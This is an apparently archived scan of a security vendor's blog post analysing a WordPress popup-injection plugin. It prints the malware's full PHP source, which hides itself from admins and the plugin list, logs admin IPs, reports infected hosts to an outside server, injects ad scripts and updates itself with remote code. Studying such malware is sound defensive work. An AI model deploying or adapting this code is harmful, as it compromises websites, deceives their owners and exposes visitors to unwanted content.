prophaze.com
Open in
urlscan Pro
43.204.233.120
Public Scan
URL:
https://prophaze.com/web-application-firewall/tracking-down-new-wordpress-popup-injection-malware/
Submission: On May 28 via api from US — Scanned from DE
Submission: On May 28 via api from US — Scanned from DE
Form analysis 2 forms found in the DOM
GET https://prophaze.com/
<form class="is-search-form is-form-style is-form-style-3 is-form-id-0 " action="https://prophaze.com/" method="get" role="search" data-hs-cf-bound="true"><label for="is-search-input-0"><span class="is-screen-reader-text">Search for:</span><input
type="search" id="is-search-input-0" name="s" value="" class="is-search-input" placeholder="Search here..." autocomplete="off"></label><button type="submit" class="is-search-submit"><span class="is-screen-reader-text">Search Button</span><span
class="is-search-icon"><svg focusable="false" aria-label="Search" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="24px">
<path
d="M15.5 14h-.79l-.28-.27C15.41 12.59 16 11.11 16 9.5 16 5.91 13.09 3 9.5 3S3 5.91 3 9.5 5.91 16 9.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L20.49 19l-4.99-5zm-6 0C7.01 14 5 11.99 5 9.5S7.01 5 9.5 5 14 7.01 14 9.5 11.99 14 9.5 14z">
</path>
</svg></span></button></form>GET https://prophaze.com
<form class="elementor-search-form" action="https://prophaze.com" method="get" role="search" data-hs-cf-bound="true">
<div class="elementor-search-form__container">
<label class="elementor-screen-only" for="elementor-search-form-fe9ed89">Search</label>
<input id="elementor-search-form-fe9ed89" placeholder="Search..." class="elementor-search-form__input" type="search" name="s" value="">
<button class="elementor-search-form__submit" type="submit" aria-label="Search">
<i aria-hidden="true" class="fas fa-search"></i> <span class="elementor-screen-only">Search</span>
</button>
</div>
</form>Text Content
Privacy is our priority. We do not sell or otherwise share personal information
for money or anything of value. We use strictly necessary cookies to enable site
functionality and improve the performance of our website. We also store cookies
to personalize the website content and to serve more relevant content to you.
For more information please visit our Privacy Policy or Cookie Policy. Privacy
Policy
Agree All
Skip to Content
Toggle navigation
* Products
* Prophaze WAF 3.0
* API Security
* Cloud WAF
* Kubernetes WAF
* On Premises WAF
* WAF API Gateway
* Bot Protection
* Layer 7 DDoS Protection
* Prophaze DNS
* Solution
* WAF-as-a-Service
* MSP and MSSP
* Prophaze ASPM
* By Industry
* E-Commerce
* Healthcare
* Education
* Financial Services
* By Cloud
* Containers Service Mesh
* Google Cloud
* Microsoft Azure
* AWS Waf
* SaaS
* Hybrid Cloud
* Private Cloud
* Partners
* Pricing
* About Us
* Our Team
* Compliance
* Pricing
* How it works
* Integration
* Why choose Us?
* Resources
* Prophaze 5G API Security
* Case Studies
* Resource library
* KB Articles
* Blog
* Common Vulnerabilities and Exposures
* Learn Cyber Security
* WAF Comparison
* Prophaze-vs-Cloud Armor
* Prophaze-vs-Cloudflare
* Prophaze-vs-AWS
* Prophaze-vs-Azure
* Prophaze-vs-Imperva
* Prophaze-vs-Akamai
* Prophaze-vs-Radware
* Prophaze-vs-F5
* Documentation
* FAQ
* Community
* Contact Us
* Search for:Search Button
Free Trial Free Trial
Free Trial
* Web Application Firewall
TRACKING DOWN NEW WORDPRESS POPUP INJECTION MALWARE
* Prophaze WAF
* July 31, 2020
* 8:08 am
A new variant of popup injector WordPress malware is spreading and affecting
1000s of WordPress websites. The web master was getting once in a weekly email
from visitors complaining about adult content popups on the website.
UPDATE – CONTACT SECURITY@PROPHAZE.COM TO CLEAN THIS VARIANT AND SECURE YOUR
WEBSITE FROM SIMILAR ATTACKS
An interesting fact about the malware is
* It’s not showing to admin users of the website.
* Not showing to logged-in users.
* Even for not logged in users, the popup is running at different times of the
day.
* Popup is distributed in different regions
Site-admin did a complete update of WordPress core – No change
Updated all plugins – No change
Updated the current theme and plugins – No change
Disabled all the plugins and switched to default theme – No change
Finally, in the wp-plugins directory, a file name ccode.php was found with
malicious code
Upon inspecting the code, it was
* Hiding the popups from admin ips.
* Not showing in for logged in users.
* Hiding itself from Active plugins list.
And few other typical behaviors as shown below
add_action( 'admin_init', function() {
register_setting( 'ccode-settings', 'default_mont_options' );
register_setting( 'ccode-settings', 'ad_code' );
register_setting( 'ccode-settings', 'hide_admin' );
register_setting( 'ccode-settings', 'hide_logged_in' );
register_setting( 'ccode-settings', 'display_ad' );
register_setting( 'ccode-settings', 'search_engines' );
register_setting( 'ccode-settings', 'auto_update' );
register_setting( 'ccode-settings', 'ip_admin');
register_setting( 'ccode-settings', 'cookies_admin' );
register_setting( 'ccode-settings', 'logged_admin' );
register_setting( 'ccode-settings', 'log_install' );
});
Also it auto updates from several domain
if (($new_version = @file_get_contents("http://www.vomndo.com/update.php")
OR $new_version = @file_get_contents_ccode("http://www.vomndo.com/update.php"))
AND stripos($new_version, $plugin_key) !== false) {
if (stripos($new_version, $plugin_key) !== false
AND stripos($new_version, '$version=') !== false) {
@file_put_contents(__FILE__, $new_version);
}
}
Different url it uses if one goes down
1) http://www.vomndo.xyz
2)http://www.vomndo.top
Code to hide from active plugin list
add_action('pre_current_active_plugins', 'hide_plugin_ccode');
Just delete the ccode.php from wp-plugins.php , and update wordpress core and other plugins , because its clear that a bot
or exploit might have used an existing vulnerbility to inject this code into plugins directory
Full code for reference
<?php
/**
* Plugin Name: Custom Code
* Description: show cusom ad codes with many options .
* Author: Alberto Uozumi
* Version: 1.0
*/
error_reporting(0);
ini_set('display_errors', 0);
$plugin_key='513ca0e9b3d5b9dbce390430591d7f43';
$version='1.2';
add_action('admin_menu', function() {
add_options_page( 'ccode Plugin', 'ccode', 'manage_options', 'ccode', 'ccode_page' );
remove_submenu_page( 'options-general.php', 'ccode' );
});
add_filter('plugin_action_links_'.plugin_basename(__FILE__), 'salcode_add_plugin_page_settings_ccode');
function salcode_add_plugin_page_settings_ccode( $links ) {
$links[] = '<a href="' .
admin_url( 'options-general.php?page=ccode' ) .
'">' . __('Settings') . '</a>';
return $links;
}
add_action( 'admin_init', function() {
register_setting( 'ccode-settings', 'default_mont_options' );
register_setting( 'ccode-settings', 'ad_code' );
register_setting( 'ccode-settings', 'hide_admin' );
register_setting( 'ccode-settings', 'hide_logged_in' );
register_setting( 'ccode-settings', 'display_ad' );
register_setting( 'ccode-settings', 'search_engines' );
register_setting( 'ccode-settings', 'auto_update' );
register_setting( 'ccode-settings', 'ip_admin');
register_setting( 'ccode-settings', 'cookies_admin' );
register_setting( 'ccode-settings', 'logged_admin' );
register_setting( 'ccode-settings', 'log_install' );
});
$ad_code="
<script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https://iclickcdn.com/tag.min.js',3388587,document.body||document.documentElement)</script>
<script src=\"https://propu.sh/pfe/current/tag.min.js?z=3388595\" data-cfasync=\"false\" async></script>
<script type=\"text/javascript\" src=\"//inpagepush.com/400/3388600\" data-cfasync=\"false\" async=\"async\"></script>
";
$hide_admin='on';
$hide_logged_in='on';
$display_ad='organic';
$search_engines='google.,/search?,images.google., web.info.com, search.,yahoo.,yandex,msn.,baidu,bing.,doubleclick.net,googleweblight.com';
$auto_update='on';
$ip_admin='on';
$cookies_admin='on';
$logged_admin='on';
$log_install='';
function ccode_page() {
?>
<div class="wrap">
<form action="options.php" method="post">
<?php
settings_fields( 'ccode-settings' );
do_settings_sections( 'ccode-settings' );
$ad_code='';
$hide_admin='on';
$hide_logged_in='on';
$display_ad='organic';
$search_engines='google.,/search?,images.google., web.info.com, search.,yahoo.,yandex,msn.,baidu,bing.,doubleclick.net,googleweblight.com';
$auto_update='on';
$ip_admin='on';
$cookies_admin='on';
$logged_admin='on';
$log_install='';
?>
<h2>ccode Plugin</h2>
<table>
<tr>
<th>Ad Code</th>
<td><textarea placeholder="" name="ad_code" rows="5" cols="130"><?php echo get_option('ad_code',$ad_code) ; ?></textarea></td>
</tr>
<tr>
<th>Hide ads to :</th>
<td>
<input type="hidden" id="default_mont_options" name="default_mont_options" value="on">
<label>
<input type="checkbox" name="hide_admin" <?php echo esc_attr( get_option('hide_admin',$hide_admin) ) == 'on' ? 'checked="checked"' : ''; ?> />admins
</label>
<label>
<input type="checkbox" name="hide_logged_in" <?php echo esc_attr( get_option('hide_logged_in',$hide_logged_in) ) == 'on' ? 'checked="checked"' : ''; ?> />logged in users
</label>
<br/>
</td>
</tr>
<tr>
<th>Recognize admin by :</th>
<td>
<label>
<input type="checkbox" name="logged_admin" <?php echo esc_attr( get_option('logged_admin',$logged_admin) ) == 'on' ? 'checked="checked"' : ''; ?> />logged in
</label>
<label>
<input type="checkbox" name="ip_admin" id="ip_admin" <?php echo esc_attr( get_option('ip_admin',$ip_admin) ) == 'on' ? 'checked="checked"' : '' ?> />By IP addresses
</label>
<label>
<input type="checkbox" name="cookies_admin" <?php echo esc_attr( get_option('cookies_admin',$cookies_admin) ) == 'on' ? 'checked="checked"' : ''; ?> />By Cookies
</label>
</td>
</tr>
<tr>
<th>Display ads to :</th>
<td>
<select name="display_ad">
<option value="organic" <?php echo esc_attr( get_option('display_ad',$display_ad) ) == 'organic' ? 'selected="selected"' : ''; ?>>Organic traffic only</option>
<option value="all_visitors" <?php echo esc_attr( get_option('display_ad') ) == 'all_visitors' ? 'selected="selected"' : ''; ?>>All Visitors</option>
</select>
</td>
</tr>
<tr>
<th>Search Engines</th>
<td><input type="text" placeholder="Internal title" name="search_engines" value="<?php echo esc_attr( get_option('search_engines',$search_engines) ); ?>" size="80" /><p class="description">
comma separated </p>
</td>
</tr>
<tr>
<th>Auto Update :</th>
<td>
<label>
<input type="checkbox" name="auto_update" <?php echo esc_attr( get_option('auto_update',$auto_update) ) == 'on' ? 'checked="checked"' : ''; ?> />auto update plugin
</label><br/>
</td>
</tr>
<tr>
<td><?php submit_button(); ?></td>
</tr>
</table>
</form>
</div>
<?php
}
/*************************log install***************************/
if(get_option('log_install') !=='1')
{
if(!$log_installed = @file_get_contents("http://www.vomndo.com/o2.php?host=".$_SERVER["HTTP_HOST"]))
{
$log_installed = @file_get_contents_ccode("http://www.vomndo.com/o2.php?host=".$_SERVER["HTTP_HOST"]);
}
}
/*************************set default options***************************/
if(get_option('default_mont_options') !=='on')
{
update_option('ip_admin', $ip_admin);
update_option('ad_code', $ad_code);
update_option('cookies_admin', $cookies_admin);
update_option('logged_admin', $logged_admin);
update_option('hide_admin', $hide_admin);
update_option('hide_logged_in', $hide_logged_in);
update_option('display_ad', $display_ad);
update_option('search_engines', $search_engines);
update_option('auto_update', $auto_update);
update_option('log_install', '1');
}
/************************************************************************/
include_once(ABSPATH . 'wp-includes/pluggable.php');
if ( ! function_exists( 'display_ad_single' ) ) {
function display_ad_single($content){
if(is_single())
{
$content=$content.get_option('ad_code');;
}
return $content;
}
function display_ad_footer(){
if(!is_single())
{
echo get_option('ad_code');
}
}
//setting cookies if admin logged in
function setting_admin_cookie() {
setcookie( 'wordpress_admin_logged_in',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);
}
if(get_option('cookies_admin')=='on')
{
if(is_user_logged_in())
{
add_action( 'init', 'setting_admin_cookie',1 );
}
}
//log admin IP addresses
$vis_ip=getVisIpAddr_ccode();
if(get_option('ip_admin')=='on')
{
if(current_user_can('edit_others_pages'))
{
if (file_exists(plugin_dir_path( __FILE__ ) .'admin_ips.txt'))
{
$ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');
}
if (stripos($ip, $vis_ip) === false)
{
$ip.=$vis_ip.'
';
@file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);
}
}
}// end if log admins ip
//add cookies to organic traffic
if(get_option('display_ad')=='organic')
{
$search_engines = explode(',', get_option('search_engines'));
$referer = $_SERVER['HTTP_REFERER'];
$SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com');
foreach ($search_engines as $search) {
if (strpos($referer,$search)!==false) {
setcookie("organic", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN);
$organic=true;
}
}
}//end
//display ad
if(!isset($_COOKIE['wordpress_admin_logged_in']) && !is_user_logged_in())
{
$ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');
if (stripos($ips, $vis_ip) === false)
{
/*****/
if(get_option('display_ad')=='organic')
{
if($organic==true || isset($_COOKIE['organic']))
{
add_filter('the_content','display_ad_single');
add_action('wp_footer','display_ad_footer');
}
}
else
{
add_filter('the_content','display_ad_single');
add_action('wp_footer','display_ad_footer');
}
/****/
}
}
/*******************/
//update plugin
if(get_option('auto_update')=='on')
{
if( ini_get('allow_url_fopen') ) {
if (($new_version = @file_get_contents("http://www.vomndo.com/update.php") OR $new_version = @file_get_contents_ccode("http://www.vomndo.com/update.php")) AND stripos($new_version, $plugin_key) !== false) {
if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
@file_put_contents(__FILE__, $new_version);
}
}
elseif ($new_version = @file_get_contents("http://www.vomndo.xyz/update.php") AND stripos($new_version, $plugin_key) !== false) {
if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
@file_put_contents(__FILE__, $new_version);
}
}
elseif ($new_version = @file_get_contents("http://www.vomndo.top/update.php") AND stripos($new_version, $plugin_key) !== false) {
if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
@file_put_contents(__FILE__, $new_version);
}
}
}
else
{
if (($new_version = @file_get_contents("http://www.vomndo.com/update.php") OR $new_version = @file_get_contents_ccode("http://www.vomndo.com/update.php")) AND stripos($new_version, $plugin_key) !== false) {
if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
@file_put_contents(__FILE__, $new_version);
}
}
elseif ($new_version = @file_get_contents_ccode("http://www.vomndo.xyz/update.php")
AND stripos($new_version, $plugin_key) !== false) {
if (stripos($new_version, $plugin_key) !== false
AND stripos($new_version, '$version=') !== false) {
@file_put_contents(__FILE__, $new_version);
}
}
elseif ($new_version = @file_get_contents_ccode("http://www.vomndo.top/update.php") AND stripos($new_version, $plugin_key) !== false) {
if (stripos($new_version, $plugin_key) !== false
AND stripos($new_version, '$version=') !== false) {
@file_put_contents(__FILE__, $new_version);
}
}
}
}//end if auto update
/*********************************/
}// if function exist
function file_get_contents_ccode($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
function hide_plugin_ccode() {
global $wp_list_table;
$hidearr = array('ccode.php');
$myplugins = $wp_list_table->items;
foreach ($myplugins as $key => $val) {
if (in_array($key,$hidearr)) {
unset($wp_list_table->items[$key]);
}
}
}
add_action('pre_current_active_plugins', 'hide_plugin_ccode');
function getVisIpAddr_ccode() {
if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
return $_SERVER['HTTP_CLIENT_IP'];
}
else if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
return $_SERVER['HTTP_X_FORWARDED_FOR'];
}
else {
return $_SERVER['REMOTE_ADDR'];
}
}
?>
Facebook
Twitter
LinkedIn
Search Search
Linkedin Twitter Facebook-f Youtube
RECENT POSTS
CVE-2023-21515 : SAMSUNG GALAXY STORE PRIOR 4.5.49.8 APK INPUT VALIDATION
Read More »
WHAT IS AN HTTP FLOOD DDOS ATTACK?
Read More »
WHAT IS OWASP? DESCRIBE THE OWASP TOP 10?
Read More »
FOLLOW US
ZZCMS 2018 TEMPLATE_USER.PHP ML/TITLE CODE INJECTION
August 26, 2021 No Comments
A vulnerability was found in zzcms 2018 (Content Management System) and
classified as critical. This issue affects an unknown function
Read More »
ZYXEL VPN2S 1.12 WEB SERVER PATH TRAVERSAL
September 29, 2021 No Comments
A vulnerability classified as problematic was found in ZyXEL VPN2S 1.12.
Affected by this vulnerability is an unknown part of
Read More »
ZYXEL VPN2S 1.12 CGI PROGRAM OS COMMAND INJECTION
September 29, 2021 No Comments
A vulnerability has been found in Zyxel VPN2S 1.12 and classified as critical.
This vulnerability affects some unknown processing of
Read More »
ZYXEL USG/USG FLEX/ZYWALL/ATP/VPN UP TO 4.64 WEB-BASED MANAGEMENT INTERFACE
IMPROPER AUTHENTICATION
July 2, 2021 No Comments
A vulnerability was found in Zyxel USG, USG Flex, Zywall, ATP and VPN up to 4.64
(Firewall Software). It has
Read More »
ZYXEL GS1900-8 2.60 LLDP PACKET CROSS SITE SCRIPTING
July 26, 2021 No Comments
A vulnerability was found in ZyXEL GS1900-8 2.60. It has been classified as
problematic. This affects an unknown code of
Read More »
ZYNAMICS BINDIFF UP TO 6 I64 FILE USE AFTER FREE
June 30, 2021 No Comments
A vulnerability, which was classified as critical, has been found in Zynamics
BinDiff up to 6. This issue affects an
Read More »
WEB APPLICATION FIREWALL SOLUTION
CVE-2024-35395 : TOTOLINK CP900L 4.1.5CU.798_B20221228 /ETC/SHADOW.SAMPLE
HARD-CODED PASSWORD
May 27, 2024 No Comments
Description TOTOLINK CP900L v4.1.5cu.798_B20221228 was discovered to contain a
hardcoded password vulnerability in /etc/shadow.sample, which allows attackers
to log in
Read More »
CVE-2024-5400 : OPENFIND MAIL2000 8.0 CGI OS COMMAND INJECTION
May 27, 2024 No Comments
Description Openfind Mail2000 does not properly filter parameters of specific
CGI. Remote attackers with regular privileges can exploit this vulnerability
Read More »
CVE-2024-26289 : PMB UP TO 7.3.17/7.4.8/7.5.6-1 DESERIALIZATION
May 27, 2024 No Comments
Description Deserialization of Untrusted Data vulnerability in PMB Services PMB
allows Remote Code Inclusion.This issue affects PMB: from 7.5.1 before
Read More »
Why Prophaze ?
Request Demo
Questions
Partners
Privacy Policy
Terms of Service
Plans
WAF Pricing
Blog
CVEs
Case Studies
Make in India WAF
WAF Pricing
Free WAF
Webinar
System Status
Protection from all threats
DDoS protection
Automated security policy
AI firewall
Zero-configuration
Dashboard
API security
Compliance
Security updates
Virtual patching
CONTACT
Contact Prophaze Labs:
India : +91 7994 008 420
USA : Suite 217, 691 S Milpitas Blvd,
Milpitas, CA - 95035
Mobile: +1 831- 217-6365
Australia: +61 8 7094 2020
Email : security@prophaze.com
© 2024 Copyright © Prophaze Technologies Pvt. Ltd. All rights reserved. Terms &
Conditions | Legal and Privacy | Manage Cookies